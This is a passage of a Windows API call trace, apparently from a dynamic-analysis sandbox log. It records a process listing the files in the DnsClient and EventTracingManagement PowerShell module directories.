lpOldMode=0x1b81e420) returned 1 [0264.824] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient", nBufferLength=0x105, lpBuffer=0x1b81e100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient", lpFilePart=0x0) returned 0x3c [0264.824] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e540) returned 1 [0264.824] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\dnsclient"), fInfoLevelId=0x0, lpFileInformation=0x1b81e620 | out: lpFileInformation=0x1b81e620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2c7aa8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2c7aa8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0264.824] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e500) returned 1 [0264.824] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e570) returned 1 [0264.824] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient", nBufferLength=0x105, lpBuffer=0x1b81e060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient", lpFilePart=0x0) returned 0x3c [0264.824] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient\\", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient\\", lpFilePart=0x0) returned 0x3d [0264.824] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient\\*", lpFindFileData=0x1b81e210 | out: lpFindFileData=0x1b81e210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2c7aa8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2c7aa8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8db140 [0264.825] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2c7aa8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2c7aa8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.825] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x68d, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsClient.psd1", cAlternateFileName="")) returned 1 [0264.825] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45ba, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsClientPSProvider.Format.ps1xml", cAlternateFileName="")) returned 1 [0264.825] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsClientPSProvider.Types.ps1xml", cAlternateFileName="")) returned 1 [0264.833] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10352252, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xf0c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsCmdlets.Format.ps1xml", cAlternateFileName="")) returned 1 [0264.833] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10352252, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5687, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsCmdlets.Types.ps1xml", cAlternateFileName="")) returned 1 [0264.833] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4f78, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsConfig.Format.ps1xml", cAlternateFileName="")) returned 1 [0264.833] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x44c, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsConfig.Types.ps1xml", cAlternateFileName="")) returned 1 [0264.834] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10352252, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa400, dwReserved0=0x0, dwReserved1=0x0, cFileName="dnslookup.dll", cAlternateFileName="")) returned 1 [0264.834] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1198, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DnsClient.cdxml", cAlternateFileName="")) returned 1 [0264.835] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1022, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DnsClientCache.cdxml", cAlternateFileName="")) returned 1 [0264.835] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x51a, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DnsClientGlobalSetting.cdxml", cAlternateFileName="")) returned 1 [0264.835] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe1d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DnsClientServerAddress.cdxml", cAlternateFileName="")) returned 1 [0264.836] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1444, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_DnsClientNRPTGlobal_v1.0.0.cdxml", cAlternateFileName="")) returned 1 [0264.836] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_DnsClientNrptPolicy_v1.0.0.cdxml", cAlternateFileName="")) returned 1 [0264.836] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x48da, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_DnsClientNRPTRule_v1.0.0.cdxml", cAlternateFileName="")) returned 1 [0264.837] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x48da, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_DnsClientNRPTRule_v1.0.0.cdxml", cAlternateFileName="")) returned 0 [0264.837] FindClose (in: hFindFile=0x1a8db140 | out: hFindFile=0x1a8db140) returned 1 [0264.837] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e4c0) returned 1 [0264.837] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e480) returned 1 [0264.837] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient\\DnsClient.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\dnsclient\\dnsclient.psd1")) returned 0x20 [0264.838] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0264.838] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement", lpFilePart=0x0) returned 0x49 [0264.838] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement\\", lpFilePart=0x0) returned 0x4a [0264.838] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbce0 [0264.838] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.838] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4dc, dwReserved0=0x0, dwReserved1=0x0, cFileName="EventTracingManagement.psd1", cAlternateFileName="")) returned 1 [0264.838] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x769, dwReserved0=0x0, dwReserved1=0x0, cFileName="EventTracingManagement.Types.ps1xml", cAlternateFileName="")) returned 1 [0264.839] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2353, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_AutologgerConfig_v1.0.cdxml", cAlternateFileName="")) returned 1 [0264.839] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1752, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_AutologgerConfig_v1.0.format.ps1xml", cAlternateFileName="")) returned 1 [0264.839] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1f1b, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_EtwTraceProvider_v1.0.cdxml", cAlternateFileName="")) returned 1 [0264.839] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_EtwTraceProvider_v1.0.format.ps1xml", cAlternateFileName="")) returned 1 [0264.839] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x21d6, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_EtwTraceSession_v1.0.cdxml", cAlternateFileName="")) returned 1 [0264.839] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe55, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_EtwTraceSession_v1.0.format.ps1xml", cAlternateFileName="")) returned 1 [0264.840] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe55, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_EtwTraceSession_v1.0.format.ps1xml", cAlternateFileName="")) returned 0 [0264.840] FindClose (in: hFindFile=0x1a8dbce0 | out: hFindFile=0x1a8dbce0) returned 1 [0264.840] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0264.840] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0264.840] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0264.840] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement", lpFilePart=0x0) returned 0x49 [0264.840] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement\\", lpFilePart=0x0) returned 0x4a [0264.840] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbce0 [0264.840] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.841] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4dc, dwReserved0=0x0, dwReserved1=0x0, cFileName="EventTracingManagement.psd1", cAlternateFileName="")) returned 1 [0264.841] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x769, dwReserved0=0x0, dwReserved1=0x0, cFileName="EventTracingManagement.Types.ps1xml", cAlternateFileName="")) returned 1 [0264.841] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2353, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_AutologgerConfig_v1.0.cdxml", cAlternateFileName="")) returned 1 [0264.841] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1752, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_AutologgerConfig_v1.0.format.ps1xml", cAlternateFileName="")) returned 1 [0264.841] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1f1b, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_EtwTraceProvider_v1.0.cdxml", cAlternateFileName="")) returned 1 [0264.841] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_EtwTraceProvider_v1.0.format.ps1xml", cAlternateFileName="")) returned 1 [0264.842] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x21d6, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_EtwTraceSession_v1.0.cdxml", cAlternateFileName="")) returned 1 [0264.842] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, 